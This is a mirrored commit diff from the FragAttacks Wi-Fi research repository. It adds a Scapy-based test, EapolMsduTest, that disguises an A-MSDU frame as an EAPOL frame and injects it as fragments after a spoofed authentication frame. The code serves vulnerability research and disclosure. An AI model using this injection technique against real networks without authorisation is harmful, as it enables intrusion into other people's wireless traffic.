Amazing-Mirror/fragattacks
1
0
Fork 0
mirror of https://github.com/vanhoefm/fragattacks.git synced 2025-02-07 12:44:03 -05:00
Code Issues Projects Releases Wiki Activity

fragattack: EAPO/AMSDU confusion test

Browse Source
This commit is contained in:
Mathy 2020-04-03 15:48:34 -04:00
parent 95e0400355
commit a2d46c996b
1 changed files with 57 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

59
research/inject.py
View File

@ -302,6 +302,58 @@ class EapolTest(Test):
self.fragments[0].frame = frag1 self.fragments[0].frame = frag1
self.fragments[0].frame = frag2 self.fragments[0].frame = frag2
#TODO: Move this function elsewhere?
def add_msdu_frag(src, dst, payload):
length = len(payload)
p = Ether(dst=dst, src=src, type=length)
payload = raw(payload)
total_length = len(p) + len(payload)
padding = ""
if total_length % 4 != 0:
padding = b"\x00" * (4 - (total_length % 4))
return p / payload / Raw(padding)
class EapolMsduTest(Test):
def __init__(self, ptype):
super().__init__([
Frag(Frag.Connected, False),
Frag(Frag.Connected, False, delay=2)
])
self.ptype = ptype
self.check_fn = None
def check(self, p):
if self.check_fn == None:
return False
return self.check_fn(p)
def generate(self, station):
log(STATUS, "Generating ping test", color="green")
# Generate the single frame
header, request, self.check_fn = generate_request(station, self.ptype)
# Set the A-MSDU frame type flag in the QoS header
header.Reserved = 1
# Testing
header.addr2 = "00:11:22:33:44:55"
# Masquerade A-MSDU frame as an EAPOL frame
request = LLC()/SNAP()/EAPOL()/Raw(b"\x00\x06AAAAAA") / add_msdu_frag(station.mac, station.peermac, request)
frames = create_fragments(header, request, 1)
auth = Dot11()/Dot11Auth(status=0, seqnum=1)
station.set_header(auth)
auth.addr2 = "00:11:22:33:44:55"
self.fragments[0].frame = auth
self.fragments[1].frame = frames[0]
# ----------------------------------- Abstract Station Class ----------------------------------- # ----------------------------------- Abstract Station Class -----------------------------------
class Station(): class Station():
@ -1005,8 +1057,11 @@ def prepare_tests(test_id):
#separator.addr3 = "ff:ff:ff:ff:ff:ff" #separator.addr3 = "ff:ff:ff:ff:ff:ff"
test = PingTest(REQ_DHCP, test = PingTest(REQ_DHCP,
[Frag(Frag.Connected, True), [Frag(Frag.Connected, True),
Frag(Frag.Connected, True)], Frag(Frag.Connected, True, delay=1)])
separate_with=separator) #separate_with=separator)
elif test_id == 7:
test = EapolMsduTest(REQ_DHCP)
# XXX TODO : Hardware decrypts it using old key, software using new key? # XXX TODO : Hardware decrypts it using old key, software using new key?
# So right after rekey we inject first with old key, second with new key? # So right after rekey we inject first with old key, second with new key?